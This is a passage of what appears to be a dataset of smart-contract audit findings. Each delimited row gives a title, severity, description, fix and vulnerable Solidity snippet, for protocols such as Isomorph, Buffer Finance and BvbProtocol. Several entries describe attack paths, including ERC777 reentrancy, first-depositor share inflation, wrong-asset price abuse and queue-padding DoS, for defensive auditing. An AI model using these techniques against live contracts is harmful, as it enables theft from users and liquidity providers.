Helps prevent a LUNA like issue\\n require(signedPrice > 0, \"Negative Oracle Price\");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , \"Stale pricefeed\");\\n\\n //@audit revert if price is outside of immutable bounds\\n require(signedPrice < _maxPrice, \"Upper price bound breached\");\\n require(signedPrice > _minPrice, \"Lower price bound breached\");\\n uint256 price = uint256(signedPrice);\\n return price;\\n}\\n```\\n -Outstanding loans cannot be closed or liquidated if collateral is pausedчhighчWhen a collateral is paused by governance, `collateralValid` is set to false. This causes closing and liquidating of loans to be impossible, leading to two issues. The first is that users with exist loans are unable to close their loans to recover their collateral. The second is that since debt is impossible to liquidate the protocol could end up being stuck with a lot of bad debt.\\n```\\nfunction pauseCollateralType(\\n address _collateralAddress,\\n bytes32 _currencyKey\\n ) external collateralExists(_collateralAddress) onlyAdmin {\\n require(_collateralAddress != address(0)); //this should get caught by the collateralExists check but just to be careful\\n //checks two inputs to help prevent input mistakes\\n require( _currencyKey == collateralProps[_collateralAddress].currencyKey, \"Mismatched data\");\\n collateralValid[_collateralAddress] = false;\\n collateralPaused[_collateralAddress] = true;\\n}\\n```\\n\\nWhen a collateral is paused `collateralValid[_collateralAddress]` is set to `false`. For `Vault_Lyra` `Vault_Synths` and `Vault_Velo` this will cause `closeLoan` and `callLiquidation` to revert. 
This traps existing users and prevents liquidations which will result in bad debt for the protocolчAllow liquidations and loan closure when collateral is pausedчOutstanding loans cannot be closed or liquidated, freezing user funds and causing the protocol to take on bad debtч```\\nfunction pauseCollateralType(\\n address _collateralAddress,\\n bytes32 _currencyKey\\n ) external collateralExists(_collateralAddress) onlyAdmin {\\n require(_collateralAddress != address(0)); //this should get caught by the collateralExists check but just to be careful\\n //checks two inputs to help prevent input mistakes\\n require( _currencyKey == collateralProps[_collateralAddress].currencyKey, \"Mismatched data\");\\n collateralValid[_collateralAddress] = false;\\n collateralPaused[_collateralAddress] = true;\\n}\\n```\\n -increaseCollateralAmount : User is not allowed to increase collateral freely.чmediumчFor all the tree type of vault, a user is allowed to increase collateral only if the overall collateral value is higher than the margin value.\\nimo, this restriction may not be needed. 
anyway user is adding the collateral that could eventually save from liquidation.\\nProtocol will lose advantage due to this restriction.\\nCodes from lyra vault implementation :\\nLine 184\\n```\\n require(colInUSD >= borrowMargin, \"Liquidation margin not met!\");\\n```\\n\\nFor synth - Refer here\\nFor velo - Refer hereчAllow user to add collateral freely.чUser may not have the collateral all at once, but they can add like an EMI.\\nProtocol will lose the repayment anyway.\\nWhat if no one comes for liquidation - again this could lose.ч```\\n require(colInUSD >= borrowMargin, \"Liquidation margin not met!\");\\n```\\n -Dangerous assumption on the peg of USDC can lead to manipulationsчmediumчDangerous assumption on the peg of USDC can lead to manipulations\\nThe volatility of USDC will also affect the price of the other token in the pool since it's priced in USDC (DepositReceipt_USDC.sol#L87, DepositReceipt_USDC.sol#L110) and then compared to its USD price from a Chainlink oracle (DepositReceipt_USDC.sol#L90-L98).\\nThis issue is also applicable to the hard coded peg of sUSD when evaluating the USD price of a Synthetix collateral (Vault_Synths.sol#L76):\\n```\\n/// @return returns the value of the given synth in sUSD which is assumed to be pegged at $1.\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //As it is a synth use synthetix for pricing\\n return (synthetixExchangeRates.effectiveValue(_currencyKey, _amount, SUSD_CODE)); \\n}\\n```\\n\\nTogether with isoUSD not having a stability mechanism, these assumptions can lead to different manipulations with the price of isoUSD and the arbitraging opportunities created by the hard peg assumptions (sUSD and USDC will be priced differently on exchanges and on Isomorph).чConsider using the Chainlink USDC/USD feed to get the price of USDC and price liquidity using the actual price of USDC. 
Also, consider converting sUSD prices of Synthetix collaterals to USD to mitigate the discrepancy in prices between external exchanges and Isomorph.чIf the price of USDC falls below $1, collateral will be priced higher than expected. This will keep borrowers from being liquidated. And it will probably affect the price of isoUSD since there will be an arbitrage opportunity: the cheaper USDC will be priced higher as collateral on Isomorph. If the price of USDC rises above $1, borrowers' collateral will be undervalued and some liquidations will be possible that wouldn't have been allowed if the actual price of USDC was used.ч```\\n/// @return returns the value of the given synth in sUSD which is assumed to be pegged at $1.\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //As it is a synth use synthetix for pricing\\n return (synthetixExchangeRates.effectiveValue(_currencyKey, _amount, SUSD_CODE)); \\n}\\n```\\n -Wrong constants for time delayчmediumчThis protocol uses several constants for time delay and some of them are incorrect.\\nIn `isoUSDToken.sol`, `ISOUSD_TIME_DELAY` should be `3 days` instead of 3 seconds.\\n```\\n uint256 constant ISOUSD_TIME_DELAY = 3; // days;\\n```\\n\\nIn `CollateralBook.sol`, `CHANGE_COLLATERAL_DELAY` should be `2 days` instead of 200 seconds.\\n```\\n uint256 public constant CHANGE_COLLATERAL_DELAY = 200; //2 days\\n```\\nч2 constants should be modified as mentioned above.чAdmin settings would be updated within a short period of delay so that users wouldn't react properly.ч```\\n uint256 constant ISOUSD_TIME_DELAY = 3; // days;\\n```\\n -Unnecessary precision loss in `_recipientBalance()`чmediumчUsing `ratePerSecond()` to calculate the `_recipientBalance()` incurs an unnecessary precision loss.\\nThe current formula in `_recipientBalance()` to calculate the vested amount (balance) incurs an unnecessary precision loss, as it includes div before mul:\\n```\\nbalance = 
elapsedTime_ * (RATE_DECIMALS_MULTIPLIER * tokenAmount_ / duration) / RATE_DECIMALS_MULTIPLIER\\n```\\n\\nThis can be avoided and the improved formula can also save some gas.чConsdier changing to:\\n```\\nbalance = elapsedTime_ * tokenAmount_ / duration\\n```\\nчPrecision loss in `_recipientBalance()`.ч```\\nbalance = elapsedTime_ * (RATE_DECIMALS_MULTIPLIER * tokenAmount_ / duration) / RATE_DECIMALS_MULTIPLIER\\n```\\n -The ````Stream```` contract is designed to receive ETH but not implement function for withdrawalчmediumчThe `Stream` contract instances can receive ETH but can not withdraw, ETH occasionally sent by users will be stuck in those contracts.\\nShown as the test case, it can receive ETH normally.\\n```\\ncontract StreamReceiveETHTest is StreamTest {\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n function test_receiveETH() public {\\n s = Stream(\\n factory.createStream(\\n payer, recipient, STREAM_AMOUNT, address(token), startTime, stopTime\\n )\\n );\\n\\n vm.deal(payer, 10 ether);\\n vm.prank(payer);\\n (bool success, ) = address(s).call{value: 1 ether}(\"\");\\n assertEq(success, true);\\n assertEq(address(s).balance, 1 ether);\\n }\\n}\\n```\\n\\nResult\\n```\\nRunning 1 test for test/Stream.t.sol:StreamReceiveETHTest\\n[PASS] test_receiveETH() (gas: 167691)\\nTest result: ok. 
1 passed; 0 failed; finished in 1.25ms\\n```\\nчIssue The `Stream` contract is designed to receive ETH but not implement function for withdrawal\\nAdd a `rescueETH()` function which is similar with the existing `rescueERC20()`чSee Summaryч```\\ncontract StreamReceiveETHTest is StreamTest {\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n function test_receiveETH() public {\\n s = Stream(\\n factory.createStream(\\n payer, recipient, STREAM_AMOUNT, address(token), startTime, stopTime\\n )\\n );\\n\\n vm.deal(payer, 10 ether);\\n vm.prank(payer);\\n (bool success, ) = address(s).call{value: 1 ether}(\"\");\\n assertEq(success, true);\\n assertEq(address(s).balance, 1 ether);\\n }\\n}\\n```\\n -If the recipient is added to the USDC blacklist, then cancel() does not workчmediumчcancel() will send the vested USDC to the recipient, if the recipient is added to the USDC blacklist, then cancel() will not work\\nWhen cancel() is called, it sends the vested USDC to the recipient and cancels future payments. Consider a scenario where if the payer intends to call cancel() to cancel the payment stream, a malicious recipient can block the address from receiving USDC by adding it to the USDC blacklist (e.g. by doing something malicious with that address, etc.), which prevents the payer from canceling the payment stream and withdrawing future payments\\n```\\n function cancel() external onlyPayerOrRecipient {\\n address payer_ = payer();\\n address recipient_ = recipient();\\n IERC20 token_ = token();\\n\\n uint256 recipientBalance = balanceOf(recipient_);\\n\\n // This zeroing is important because without it, it's possible for recipient to obtain additional funds\\n // from this contract if anyone (e.g. 
payer) sends it tokens after cancellation.\\n // Thanks to this state update, `balanceOf(recipient_)` will only return zero in future calls.\\n remainingBalance = 0;\\n\\n if (recipientBalance > 0) token_.safeTransfer(recipient_, recipientBalance);\\n```\\nчIssue If the recipient is added to the USDC blacklist, then cancel() does not work\\nInstead of sending tokens directly to the payer or recipient in cancel(), consider storing the number of tokens in variables and having the payer or recipient claim it laterчA malicious recipient may prevent the payer from canceling the payment stream and withdrawing future paymentsч```\\n function cancel() external onlyPayerOrRecipient {\\n address payer_ = payer();\\n address recipient_ = recipient();\\n IERC20 token_ = token();\\n\\n uint256 recipientBalance = balanceOf(recipient_);\\n\\n // This zeroing is important because without it, it's possible for recipient to obtain additional funds\\n // from this contract if anyone (e.g. payer) sends it tokens after cancellation.\\n // Thanks to this state update, `balanceOf(recipient_)` will only return zero in future calls.\\n remainingBalance = 0;\\n\\n if (recipientBalance > 0) token_.safeTransfer(recipient_, recipientBalance);\\n```\\n -Adverary can DOS contract by making a large number of deposits/withdraws then removing them allчhighчWhen a user dequeues a withdraw or deposit it leaves a blank entry in the withdraw/deposit. This entry must be read from memory and skipped when processing the withdraws/deposits which uses gas for each blank entry. An adversary could exploit this to DOS the contract. 
By making a large number of these blank deposits they could make it impossible to process any auction.\\n```\\n while (_quantity > 0) {\\n Receipt memory deposit = deposits[i];\\n if (deposit.amount == 0) {\\n i++;\\n continue;\\n }\\n if (deposit.amount <= _quantity) {\\n // deposit amount is lesser than quantity use it fully\\n _quantity = _quantity - deposit.amount;\\n usdBalance[deposit.sender] -= deposit.amount;\\n amountToSend = (deposit.amount * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, deposit.amount, amountToSend, i, 0);\\n delete deposits[i];\\n i++;\\n } else {\\n // deposit amount is greater than quantity; use it partially\\n deposits[i].amount = deposit.amount - _quantity;\\n usdBalance[deposit.sender] -= _quantity;\\n amountToSend = (_quantity * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, _quantity, amountToSend, i, 0);\\n _quantity = 0;\\n }\\n }\\n```\\n\\nThe code above processes deposits in the order they are submitted. An adversary can exploit this by withdrawing/depositing a large number of times then dequeuing them to create a larger number of blank deposits. Since these are all zero, it creates a fill or kill scenario. Either all of them are skipped or none. If the adversary makes the list long enough then it will be impossible to fill without going over block gas limit.чTwo potential solutions. The first would be to limit the number of deposits/withdraws that can be processed in a single netting. 
The second would be to allow the owner to manually skip withdraws/deposits by calling an function that increments depositsIndex and withdrawsIndex.чContract can be permanently DOS'dч```\\n while (_quantity > 0) {\\n Receipt memory deposit = deposits[i];\\n if (deposit.amount == 0) {\\n i++;\\n continue;\\n }\\n if (deposit.amount <= _quantity) {\\n // deposit amount is lesser than quantity use it fully\\n _quantity = _quantity - deposit.amount;\\n usdBalance[deposit.sender] -= deposit.amount;\\n amountToSend = (deposit.amount * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, deposit.amount, amountToSend, i, 0);\\n delete deposits[i];\\n i++;\\n } else {\\n // deposit amount is greater than quantity; use it partially\\n deposits[i].amount = deposit.amount - _quantity;\\n usdBalance[deposit.sender] -= _quantity;\\n amountToSend = (_quantity * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, _quantity, amountToSend, i, 0);\\n _quantity = 0;\\n }\\n }\\n```\\n -resolveQueuedTrades() ERC777 re-enter to steal fundsчmediumч_openQueuedTrade() does not follow the “Checks Effects Interactions” principle and may lead to re-entry to steal the funds\\nThe prerequisite is that tokenX is ERC777 e.g. 
“sushi”\\nresolveQueuedTrades() call _openQueuedTrade()\\nin _openQueuedTrade() call \"tokenX.transfer(queuedTrade.user)\" if (revisedFee < queuedTrade.totalFee) before set queuedTrade.isQueued = false;\\n```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n if (revisedFee < queuedTrade.totalFee) {\\n tokenX.transfer( //***@audit call transfer , if ERC777 , can re-enter ***/\\n queuedTrade.user,\\n queuedTrade.totalFee - revisedFee\\n );\\n }\\n\\n queuedTrade.isQueued = false; //****@audit change state****/\\n }\\n```\\n\\n3.if ERC777 re-enter to #cancelQueuedTrade() to get tokenX back,it can close, because queuedTrade.isQueued still equal true 4. back to _openQueuedTrade() set queuedTrade.isQueued = false 5.so steal tokenXчfollow “Checks Effects Interactions”\\n```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n+ queuedTrade.isQueued = false; \\n // Transfer the fee to the target options contract\\n IERC20 tokenX = IERC20(optionsContract.tokenX());\\n tokenX.transfer(queuedTrade.targetContract, revisedFee);\\n\\n- queuedTrade.isQueued = false; \\n emit OpenTrade(queuedTrade.user, queueId, optionId);\\n }\\n```\\nчif tokenX equal ERC777 can steal tokenч```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n if (revisedFee < queuedTrade.totalFee) {\\n tokenX.transfer( //***@audit call transfer , if ERC777 , can re-enter ***/\\n queuedTrade.user,\\n queuedTrade.totalFee - revisedFee\\n );\\n }\\n\\n queuedTrade.isQueued = false; //****@audit change state****/\\n }\\n```\\n -The `_fee()` function is wrongly implemented in the codeчmediumч_fee() function is wrongly implemented in the code so the protocol will get fewer fees and the trader will earn more\\n```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n\\nlet's say we have: `newFee` 100 USDC USDC Decimals 
is 6 `settlementFeePercentage` is 20% ==> 200\\nThe `unitFee` will be 520_000\\n`amount` = (100 * 1_000_000) / 520_000 `amount` = 192 USDC Which is supposed to be `amount` = 160 USDCчThe `_fee()` function needs to calculate the fees in this way\\n```\\ntotal_fee = (5000 * amount)/ (10000 - sf)\\n```\\nчThe protocol will earn fees less than expectedч```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n -resolveQueuedTrades is intended to be non atomic but invalid signature can still cause entire transaction to revertчmediumчBufferRouter#resolveQueuedTrades and unlockOptions attempt to be non atomic (i.e. doesn't revert the transaction if one fails) but an invalid signature can still cause the entire transaction to revert, because the ECDSA.recover sub call in _validateSigner can still revert.\\n```\\nfunction _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n address recoveredSigner = ECDSA.recover(digest, signature);\\n return recoveredSigner == publisher;\\n}\\n```\\n\\n_validateSigner can revert at the ECDSA.recover sub call breaking the intended non atomic nature of BufferRouter#resolveQueuedTrades and unlockOptions.чUse a try statement inside _validateSigner to avoid any reverts:\\n```\\n function _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n ) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n- address recoveredSigner = ECDSA.recover(digest, signature);\\n\\n+ try ECDSA.recover(digest, signature) returns (address recoveredSigner) {\\n+ return recoveredSigner == publisher;\\n+ } else {\\n+ return false;\\n+ }\\n 
}\\n```\\nчBufferRouter#resolveQueuedTrades and unlockOptions don't function as intended if signature is malformedч```\\nfunction _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n address recoveredSigner = ECDSA.recover(digest, signature);\\n return recoveredSigner == publisher;\\n}\\n```\\n -When private keeper mode is off users can queue orders with the wrong assetчhighчAfter an order is initiated, it must be filled by calling resolveQueuedTrades. This function validates that the asset price has been signed but never validates that the asset being passed in matches the asset of the queuedTrade. When private keeper mode is off, which is the default state of the contract, this can be abused to cause huge loss of funds.\\n```\\n for (uint32 index = 0; index < params.length; index++) {\\n OpenTradeParams memory currentParams = params[index];\\n QueuedTrade memory queuedTrade = queuedTrades[\\n currentParams.queueId\\n ];\\n bool isSignerVerifed = _validateSigner(\\n currentParams.timestamp,\\n currentParams.asset,\\n currentParams.price,\\n currentParams.signature\\n );\\n // Silently fail if the signature doesn't match\\n if (!isSignerVerifed) {\\n emit FailResolve(\\n currentParams.queueId,\\n \"Router: Signature didn't match\"\\n );\\n continue;\\n }\\n if (\\n !queuedTrade.isQueued ||\\n currentParams.timestamp != queuedTrade.queuedTime\\n ) {\\n // Trade has already been opened or cancelled or the timestamp is wrong.\\n // So ignore this trade.\\n continue;\\n }\\n\\n // If the opening time is much greater than the queue time then cancel the trad\\n if (block.timestamp - queuedTrade.queuedTime <= MAX_WAIT_TIME) {\\n _openQueuedTrade(currentParams.queueId, currentParams.price);\\n } else {\\n _cancelQueuedTrade(currentParams.queueId);\\n emit CancelTrade(\\n 
queuedTrade.user,\\n currentParams.queueId,\\n \"Wait time too high\"\\n );\\n }\\n\\n // Track the next queueIndex to be processed for user\\n userNextQueueIndexToProcess[queuedTrade.user] =\\n queuedTrade.userQueueIndex +\\n 1;\\n }\\n```\\n\\nBufferRouter#resolveQueueTrades never validates that the asset passed in for params is the same asset as the queuedTrade. It only validates that the price is the same, then passes the price and queueId to _openQueuedTrade:\\n```\\nfunction _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n QueuedTrade storage queuedTrade = queuedTrades[queueId];\\n IBufferBinaryOptions optionsContract = IBufferBinaryOptions(\\n queuedTrade.targetContract\\n );\\n\\n bool isSlippageWithinRange = optionsContract.isStrikeValid(\\n queuedTrade.slippage,\\n price,\\n queuedTrade.expectedStrike\\n );\\n\\n if (!isSlippageWithinRange) {\\n _cancelQueuedTrade(queueId);\\n emit CancelTrade(\\n queuedTrade.user,\\n queueId,\\n \"Slippage limit exceeds\"\\n );\\n\\n return;\\n }\\n\\n // rest of code\\n\\n optionParams.totalFee = revisedFee;\\n optionParams.strike = price;\\n optionParams.amount = amount;\\n\\n uint256 optionId = optionsContract.createFromRouter(\\n optionParams,\\n isReferralValid\\n );\\n```\\n\\nInside _openQueuedTrade it checks that the price is within the slippage bounds of the order, cancelling if its not. Otherwise it uses the price to open an option. According to documentation, the same router will be used across a large number of assets/pools, which means the publisher for every asset is the same, given that router only has one publisher variable.\\nExamples:\\nImagine two assets are listed that have close prices, asset A = $0.95 and asset B = $1. An adversary could create an call that expires in 10 minutes on asset B with 5% slippage, then immediately queue it with the price of asset A. $0.95 is within the slippage bounds so it creates the option with a strike price of $0.95. 
Since the price of asset B is actually $1 the adversary will almost guaranteed make money, stealing funds from the LPs. This can be done back and forth between both pools until pools for both assets are drained.\\nIn a similar scenario, if the price of the assets are very different, the adversary could use this to DOS another user by always calling queue with the wrong asset, causing the order to be cancelled.чPass the asset address through so the BufferBinaryOptions contract can validate it is being called with the correct assetчAdversary can rug LPs and DOS other usersч```\\n for (uint32 index = 0; index < params.length; index++) {\\n OpenTradeParams memory currentParams = params[index];\\n QueuedTrade memory queuedTrade = queuedTrades[\\n currentParams.queueId\\n ];\\n bool isSignerVerifed = _validateSigner(\\n currentParams.timestamp,\\n currentParams.asset,\\n currentParams.price,\\n currentParams.signature\\n );\\n // Silently fail if the signature doesn't match\\n if (!isSignerVerifed) {\\n emit FailResolve(\\n currentParams.queueId,\\n \"Router: Signature didn't match\"\\n );\\n continue;\\n }\\n if (\\n !queuedTrade.isQueued ||\\n currentParams.timestamp != queuedTrade.queuedTime\\n ) {\\n // Trade has already been opened or cancelled or the timestamp is wrong.\\n // So ignore this trade.\\n continue;\\n }\\n\\n // If the opening time is much greater than the queue time then cancel the trad\\n if (block.timestamp - queuedTrade.queuedTime <= MAX_WAIT_TIME) {\\n _openQueuedTrade(currentParams.queueId, currentParams.price);\\n } else {\\n _cancelQueuedTrade(currentParams.queueId);\\n emit CancelTrade(\\n queuedTrade.user,\\n currentParams.queueId,\\n \"Wait time too high\"\\n );\\n }\\n\\n // Track the next queueIndex to be processed for user\\n userNextQueueIndexToProcess[queuedTrade.user] =\\n queuedTrade.userQueueIndex +\\n 1;\\n }\\n```\\n -Early depositors to BufferBinaryPool can manipulate exchange rates to steal funds from later depositorsчhighчTo 
calculate the exchange rate for shares in BufferBinaryPool it divides the total supply of shares by the totalTokenXBalance of the vault. The first deposit can mint a very small number of shares then donate tokenX to the vault to grossly manipulate the share price. When later depositor deposit into the vault they will lose value due to precision loss and the adversary will profit.\\n```\\nfunction totalTokenXBalance()\\n public\\n view\\n override\\n returns (uint256 balance)\\n{\\n return tokenX.balanceOf(address(this)) - lockedPremium;\\n}\\n```\\n\\nShare exchange rate is calculated using the total supply of shares and the totalTokenXBalance, which leaves it vulnerable to exchange rate manipulation. As an example, assume tokenX == USDC. An adversary can mint a single share, then donate 1e8 USDC. Minting the first share established a 1:1 ratio but then donating 1e8 changed the ratio to 1:1e8. Now any deposit lower than 1e8 (100 USDC) will suffer from precision loss and the attackers share will benefit from it.чRequire a small minimum deposit (i.e. 1e6)чAdversary can effectively steal funds from later users through precision lossч```\\nfunction totalTokenXBalance()\\n public\\n view\\n override\\n returns (uint256 balance)\\n{\\n return tokenX.balanceOf(address(this)) - lockedPremium;\\n}\\n```\\n -When tokenX is an ERC777 token, users can bypass maxLiquidityчmediumчWhen tokenX is an ERC777 token, users can use callbacks to provide liquidity exceeding maxLiquidity\\nIn BufferBinaryPool._provide, when tokenX is an ERC777 token, the tokensToSend function of account will be called in tokenX.transferFrom before sending tokens. 
When the user calls provide again in tokensToSend, since BufferBinaryPool has not received tokens at this time, totalTokenXBalance() has not increased, and the following checks can be bypassed, so that users can provide liquidity exceeding maxLiquidity.\\n```\\n require(\\n balance + tokenXAmount <= maxLiquidity,\\n \"Pool has already reached it's max limit\"\\n );\\n```\\nчChange to\\n```\\n function _provide(\\n uint256 tokenXAmount,\\n uint256 minMint,\\n address account\\n ) internal returns (uint256 mint) {\\n// Add the line below\\n bool success = tokenX.transferFrom(\\n// Add the line below\\n account,\\n// Add the line below\\n address(this),\\n// Add the line below\\n tokenXAmount\\n// Add the line below\\n );\\n uint256 supply = totalSupply();\\n uint256 balance = totalTokenXBalance();\\n\\n require(\\n balance // Add the line below\\n tokenXAmount <= maxLiquidity,\\n \"Pool has already reached it's max limit\"\\n );\\n\\n if (supply > 0 && balance > 0)\\n mint = (tokenXAmount * supply) / (balance);\\n else mint = tokenXAmount * INITIAL_RATE;\\n\\n require(mint >= minMint, \"Pool: Mint limit is too large\");\\n require(mint > 0, \"Pool: Amount is too small\");\\n\\n// Remove the line below\\n bool success = tokenX.transferFrom(\\n// Remove the line below\\n account,\\n// Remove the line below\\n address(this),\\n// Remove the line below\\n tokenXAmount\\n// Remove the line below\\n );\\n```\\nчusers can provide liquidity exceeding maxLiquidity.ч```\\n require(\\n balance + tokenXAmount <= maxLiquidity,\\n \"Pool has already reached it's max limit\"\\n );\\n```\\n -Limited support to a specific subset of ERC20 tokensчmediumчBuffer contest states 'any ERC20 supported', therefore it should take into account all the different ways of signalling success and failure. This is not the case, as all ERC20's transfer(), transferFrom(), and approve() functions are either not verified at all or verified for returning true. 
As a result, depending on the ERC20 token, some transfer errors may result in passing unnoticed, and/or some successfull transfer may be treated as failed.\\nCurrently the only supported ERC20 tokens are the ones that fulfill both the following requirements:\\nalways revert on failure;\\nalways returns boolean true on success.\\nAn example of a very well known token that is not supported is Tether USD (USDT).\\n👋 IMPORTANT This issue is not the same as reporting that \"return value must be verified to be true\" where the checks are missing! Indeed such a simplistic report should be considered invalid as it still does not solve all the problems but rather introduces others. See Vulnerability Details section for rationale.\\nTokens have different ways of signalling success and failure, and this affect mostly transfer(), transferFrom() and approve() in ERC20 tokens. While some tokens revert upon failure, others consistently return boolean flags to indicate success or failure, and many others have mixed behaviours.\\nSee below a snippet of the USDT Token contract compared to the 0x's ZRX Token contract where the USDT Token transfer function does not even return a boolean value, while the ZRX token consistently returns boolean value hence returning false on failure instead of reverting.\\nUSDT Token snippet (no return value) from Etherscan\\n```\\nfunction transferFrom(address _from, address _to, uint _value) public onlyPayloadSize(3 * 32) {\\n var _allowance = allowed[_from][msg.sender];\\n\\n // Check is not needed because sub(_allowance, _value) will already throw if this condition is not met\\n // if (_value > _allowance) throw;\\n\\n uint fee = (_value.mul(basisPointsRate)).div(10000);\\n if (fee > maximumFee) {\\n fee = maximumFee;\\n }\\n if (_allowance < MAX_UINT) {\\n allowed[_from][msg.sender] = _allowance.sub(_value);\\n }\\n uint sendAmount = _value.sub(fee);\\n balances[_from] = balances[_from].sub(_value);\\n balances[_to] = 
balances[_to].add(sendAmount);\\n if (fee > 0) {\\n balances[owner] = balances[owner].add(fee);\\n Transfer(_from, owner, fee);\\n }\\n Transfer(_from, _to, sendAmount);\\n}\\n```\\n\\nZRX Token snippet (consistently true or false boolean result) from Etherscan\\n```\\nfunction transferFrom(address _from, address _to, uint _value) returns (bool) {\\n if (balances[_from] >= _value && allowed[_from][msg.sender] >= _value && balances[_to] + _value >= balances[_to]) {\\n balances[_to] += _value;\\n balances[_from] -= _value;\\n allowed[_from][msg.sender] -= _value;\\n Transfer(_from, _to, _value);\\n return true;\\n } else { return false; }\\n}\\n```\\nчTo handle most of these inconsistent behaviors across multiple tokens, either use OpenZeppelin's SafeERC20 library, or use a more reusable implementation (i.e. library) of the following intentionally explicit, descriptive example code for an ERC20 transferFrom() call that takes into account all the different ways of signalling success and failure, and apply to all ERC20 transfer(), transferFrom(), approve() calls in the Buffer contracts.\\n```\\nIERC20 token = whatever_token;\\n\\n(bool success, bytes memory returndata) = address(token).call(abi.encodeWithSelector(IERC20.transferFrom.selector, sender, recipient, amount));\\n\\n// if success == false, without any doubts there was an error and callee reverted\\nrequire(success, \"Transfer failed!\");\\n\\n// if success == true, we need to check whether we got a return value or not (like in the case of USDT)\\nif (returndata.length > 0) {\\n // we got a return value, it must be a boolean and it should be true\\n require(abi.decode(returndata, (bool)), \"Transfer failed!\");\\n} else {\\n // since we got no return value it can be one of two cases:\\n // 1. the transferFrom does not return a boolean and it did succeed\\n // 2. 
the token address is not a contract address therefore call() always return success = true as per EVM design\\n // To discriminate between 1 and 2, we need to check if the address actually points to a contract\\n require(address(token).code.length > 0, \"Not a token address!\");\\n}\\n```\\nчGiven the different usages of token transfers in BufferBinaryOptions.sol, BufferBinaryPool.sol, and BufferRouter.sol, there can be 2 types of impacts depending on the ERC20 contract being traded.\\nThe ERC20 token being traded is one that consistently returns a boolean result in the case of success and failure like for example 0x's ZRX Token contract. Where the return value is currently not verified to be true (i.e.: #1, #2, #3, #4, #5, #6) the transfer may fail (e.g.: no tokens transferred due to insufficient balance) but the error would not be detected by the Buffer contracts.\\nThe ERC20 token being traded is one that do not return a boolean value like for example the well knonw Tether USD Token contract. 
Successful transfers would cause a revert in the Buffer contracts where the return value is verified to be true (i.e.: #1, #2, #3, #4) due to the token not returing boolean results.\\nSame is true for appove calls.ч```\\nfunction transferFrom(address _from, address _to, uint _value) public onlyPayloadSize(3 * 32) {\\n var _allowance = allowed[_from][msg.sender];\\n\\n // Check is not needed because sub(_allowance, _value) will already throw if this condition is not met\\n // if (_value > _allowance) throw;\\n\\n uint fee = (_value.mul(basisPointsRate)).div(10000);\\n if (fee > maximumFee) {\\n fee = maximumFee;\\n }\\n if (_allowance < MAX_UINT) {\\n allowed[_from][msg.sender] = _allowance.sub(_value);\\n }\\n uint sendAmount = _value.sub(fee);\\n balances[_from] = balances[_from].sub(_value);\\n balances[_to] = balances[_to].add(sendAmount);\\n if (fee > 0) {\\n balances[owner] = balances[owner].add(fee);\\n Transfer(_from, owner, fee);\\n }\\n Transfer(_from, _to, sendAmount);\\n}\\n```\\n -The `_fee()` function is wrongly implemented in the codeчmediumч_fee() function is wrongly implemented in the code so the protocol will get fewer fees and the trader will earn more\\n```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n\\nlet's say we have: `newFee` 100 USDC USDC Decimals is 6 `settlementFeePercentage` is 20% ==> 200\\nThe `unitFee` will be 520_000\\n`amount` = (100 * 1_000_000) / 520_000 `amount` = 192 USDC Which is supposed to be `amount` = 160 USDCчThe `_fee()` function needs to calculate the fees in this way\\n```\\ntotal_fee = (5000 * amount)/ (10000 - sf)\\n```\\nчThe protocol will earn fees less than expectedч```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n -Bulls that are unable to receive NFTs will not be able to claim them laterчmediumчA lot of care has been taken to ensure that, if 
a bull has a contract address that doesn't accept ERC721s, the NFT is saved to `withdrawableCollectionTokenId` for later withdrawal. However, because there is no way to withdraw this token to a different address (and the original address doesn't accept NFTs), it will never be able to be claimed.\\nTo settle a contract, the bear calls `settleContract()`, which sends their NFT to the bull, and withdraws the collateral and premium to the bear.\\n```\\ntry IERC721(order.collection).safeTransferFrom(bear, bull, tokenId) {}\\ncatch (bytes memory) {\\n // Transfer NFT to BvbProtocol\\n IERC721(order.collection).safeTransferFrom(bear, address(this), tokenId);\\n // Store that the bull has to retrieve it\\n withdrawableCollectionTokenId[order.collection][tokenId] = bull;\\n}\\n\\nuint bearAssetAmount = order.premium + order.collateral;\\nif (bearAssetAmount > 0) {\\n // Transfer payment tokens to the Bear\\n IERC20(order.asset).safeTransfer(bear, bearAssetAmount);\\n}\\n```\\n\\nIn order to address the case that the bull is a contract that can't accept NFTs, the protocol uses a try-catch setup. 
